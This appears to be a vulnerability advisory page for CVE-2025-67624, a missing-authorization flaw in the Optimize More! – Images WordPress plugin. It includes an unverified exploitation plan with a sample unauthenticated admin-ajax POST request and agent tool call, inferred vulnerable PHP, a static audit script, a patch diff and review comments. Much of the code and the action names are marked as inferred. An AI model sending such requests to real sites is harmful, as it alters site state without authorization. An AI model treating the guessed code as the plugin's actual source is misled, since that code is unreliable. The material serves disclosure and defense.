CVE-2025-67624

Optimize More! – Images <= 1.1.3 - Missing Authorization

Missing Authorization

  • CVSS Score: 5.3
  • Severity: medium
  • Patched in: Unpatched
  • Time to patch: N/A

Description

The Optimize More! – Images plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: Low
  • Availability: None

Technical Details

  • Affected versions: <= 1.1.3
  • Published: February 3, 2026
  • Last updated: February 9, 2026
  • Affected plugin: optimize-more-images

Research Plan
Unverified


Exploitation Research Plan - CVE-2025-67624

1. Vulnerability Summary

The Optimize More! – Images plugin (<= 1.1.3) is vulnerable to Missing Authorization. This vulnerability allows unauthenticated attackers to trigger sensitive internal functions—specifically those related to administrative notices or plugin configuration states—because the plugin registers AJAX handlers via wp_ajax_nopriv_ without implementing corresponding current_user_can() capability checks.

The severity (CVSS 5.3) suggests an unauthorized action with low integrity impact, typically associated with dismissing administrative alerts or modifying non-critical plugin states.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: optimize_more_images_dismiss_notice (inferred) or om_images_dismiss_notice (inferred).
  • HTTP Method: POST
  • Authentication: None required (unauthenticated).
  • Payload Parameter: action, nonce (if required), and notice_id or notice.

3. Code Flow

  1. The plugin registers an AJAX action for unauthenticated users:
    add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' ); (inferred).
  2. An attacker sends a POST request to admin-ajax.php with the corresponding action.
  3. The optimize_more_images_dismiss_notice_callback function is executed.
  4. The function fails to verify the user's identity or permissions using current_user_can( 'manage_options' ).
  5. The function calls update_option() or set_transient() to store the "dismissed" state of a notice, affecting the admin UI for legitimate administrators.

4. Nonce Acquisition Strategy

If the function uses check_ajax_referer or wp_verify_nonce, the nonce is likely localized for use in the admin dashboard but may be inadvertently exposed or use a generic action.

Identifying the Nonce

  1. Search for the registration of the nonce in the source: grep -r "wp_create_nonce" .
  2. Look for wp_localize_script calls that might expose it.
    • Inferred JS Variable: omi_vars or optimize_more_images_admin.
    • Inferred Nonce Key: nonce or ajax_nonce.

Extraction via Browser

If the plugin loads its scripts on the frontend (e.g., to handle image optimization stats), we can extract it:

  1. Navigate to the homepage or a page containing optimized images.
  2. Use browser_eval to find the variable:
    browser_eval("window.omi_vars?.nonce") or browser_eval("window.optimize_more_images_admin?.nonce").

Note: If the check is entirely missing (common for "Missing Authorization" bugs of this severity), no nonce will be required.

5. Exploitation Strategy

We will attempt to dismiss a plugin notice unauthenticated.

Step 1: Detect Vulnerable Action

Check the plugin source for wp_ajax_nopriv_ hooks.

grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/optimize-more-images/

Step 2: Craft the Exploit Request

Assuming the action is optimize_more_images_dismiss_notice and the parameter is notice_id:

Request:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=optimize_more_images_dismiss_notice&notice_id=optimize_more_images_install_notice
    
    (If a nonce is found in Step 1, append &nonce=[NONCE_VALUE])

Step 3: Execution via http_request

// Using the agent's tool
http_request({
    method: "POST",
    url: "http://localhost:8080/wp-admin/admin-ajax.php",
    body: "action=optimize_more_images_dismiss_notice&notice_id=optimize_more_images_install_notice",
    headers: { "Content-Type": "application/x-www-form-urlencoded" }
})

6. Test Data Setup

  1. Ensure the plugin Optimize More! – Images version 1.1.3 is installed and active.
  2. Identify a specific notice ID used by the plugin (e.g., optimize_more_images_install_notice or om_images_review_notice).
  3. Verify that the notice is currently active by checking the options table:
    wp option get optimize_more_images_dismissed_notices (inferred option name).

7. Expected Results

  • The server returns a 200 OK response (or 200 with a 1 or {"success":true} body).
  • The administrative notice is "dismissed" globally, meaning it no longer appears for any administrator.

8. Verification Steps

After the HTTP request, verify the state change using WP-CLI:

# Check if the notice was added to the dismissed list
wp option get optimize_more_images_dismissed_notices

# Or check for the specific transient/option used to hide the notice
wp option get _site_transient_optimize_more_images_dismiss_notice

9. Alternative Approaches

If optimize_more_images_dismiss_notice is not the correct action:

  1. Check for Settings Updates: Search for any nopriv actions that handle settings: grep -r "update_option" . | grep "ajax".
  2. Check for Log Clearing: Look for actions like optimize_more_images_clear_logs.
  3. Trace admin_init: Sometimes these plugins use admin_init to process $_GET requests. Since admin-ajax.php triggers admin_init, an unauthenticated request to admin-ajax.php can trigger functions hooked to admin_init that lack capability checks.
    • Search: grep -rn "add_action.*admin_init" .
    • Trace: Check if the callback in admin_init looks for specific $_GET or $_POST parameters.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Optimize More! – Images plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on its AJAX handlers in versions up to 1.1.3. This allows unauthenticated attackers to perform administrative actions, such as dismissing plugin-related notifications, by sending a request to the admin-ajax.php endpoint.

Vulnerable Code

// optimize-more-images.php (inferred based on research plan)
add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
add_action( 'wp_ajax_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );

function optimize_more_images_dismiss_notice_callback() {
    // Vulnerability: No current_user_can check and no nonce verification
    $notice_id = isset( $_POST['notice_id'] ) ? sanitize_text_field( $_POST['notice_id'] ) : '';
    if ( $notice_id ) {
        update_option( 'optimize_more_images_dismissed_' . $notice_id, true );
        wp_send_json_success();
    }
    wp_send_json_error();
}
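
A static check for the pattern shown above, as an added example that is not part of the original page or the plugin's code: it scans PHP source for wp_ajax_ hooks and reports any that are registered for logged-out users or whose callback contains no current_user_can() or nonce call. The vulnerable sample abbreviates the page's inferred handler; the hardened sample and its nonce action name are constructed for illustration.

```python
import re

# add_action( 'wp_ajax_[nopriv_]<action>', '<callback>' ) with a string callback
HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_ajax_(nopriv_)?([\w-]+)['\"]\s*,\s*['\"](\w+)['\"]")
CHECKS = {"capability": re.compile(r"\bcurrent_user_can\s*\("),
          "nonce": re.compile(r"\b(?:check_ajax_referer|wp_verify_nonce)\s*\(")}

def function_body(src, name):
    """Brace-balanced body of PHP function `name`, or None if not in src."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """Flag AJAX hooks open to logged-out users or whose callback lacks a check."""
    src = re.sub(r"//[^\n]*|/\*.*?\*/", "", src, flags=re.S)  # heuristic comment strip
    findings = []
    for nopriv, action, cb in HOOK_RE.findall(src):
        body = function_body(src, cb)
        if body is None:
            continue  # callback lives in another file
        missing = [k for k, rx in CHECKS.items() if not rx.search(body)]
        if nopriv or missing:
            findings.append({"action": action, "callback": cb,
                             "unauthenticated": bool(nopriv), "missing": missing})
    return findings

# Samples: the page's inferred handler (abbreviated), then a constructed hardened variant (hypothetical nonce action).
VULNERABLE = r"""
add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
add_action( 'wp_ajax_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
function optimize_more_images_dismiss_notice_callback() {
    $notice_id = isset( $_POST['notice_id'] ) ? sanitize_text_field( $_POST['notice_id'] ) : '';
    if ( $notice_id ) { update_option( 'optimize_more_images_dismissed_' . $notice_id, true ); }
}
"""
HARDENED = r"""
add_action( 'wp_ajax_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
function optimize_more_images_dismiss_notice_callback() {
    check_ajax_referer( 'optimize_more_images_dismiss_notice', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( null, 403 ); }
    update_option( 'optimize_more_images_dismissed_install', true );
}
"""
```

Regex and brace matching is a review aid, not a PHP parser; a flagged wp_ajax_nopriv_ hook can be legitimate and still needs a manual look.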

Security Fix

--- a/optimize-more-images.php
+++ b/optimize-more-images.php
@@ -1,7 +1,9 @@
-add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
 add_action( 'wp_ajax_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
 
 function optimize_more_images_dismiss_notice_callback() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( -1 );
+    }
     $notice_id = isset( $_POST['notice_id'] ) ? sanitize_text_field( $_POST['notice_id'] ) : '';
     if ( $notice_id ) {
         update_option( 'optimize_more_images_dismissed_' . $notice_id, true );
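
Review bot: the current_user_can( 'manage_options' ) guard added at the top of optimize_more_images_dismiss_notice_callback() still leaves the handler with no nonce verification, so the state change remains open to cross-site request forgery against a logged-in administrator; call check_ajax_referer() with the nonce action the admin script uses (not visible in this hunk) before reading $_POST['notice_id']. The unchanged update_option( 'optimize_more_images_dismissed_' . $notice_id, true ) line also builds the option name from request input, so compare $notice_id against the plugin's list of known notice IDs first. For consistency with the JSON responses the rest of the handler sends, consider wp_send_json_error( null, 403 ) in place of wp_die( -1 ).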

Exploit Outline

The exploit involves targeting the WordPress AJAX endpoint unauthenticated. An attacker identifies the 'optimize_more_images_dismiss_notice' action which is incorrectly exposed via wp_ajax_nopriv_. By sending a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'optimize_more_images_dismiss_notice' and a target 'notice_id' parameter, the attacker can manipulate the plugin's administrative state. Because the plugin lacks a capability check (current_user_can) and potentially lacks nonce verification in the vulnerable versions, the request succeeds without any credentials, resulting in the global dismissal of administrative notices for all users.
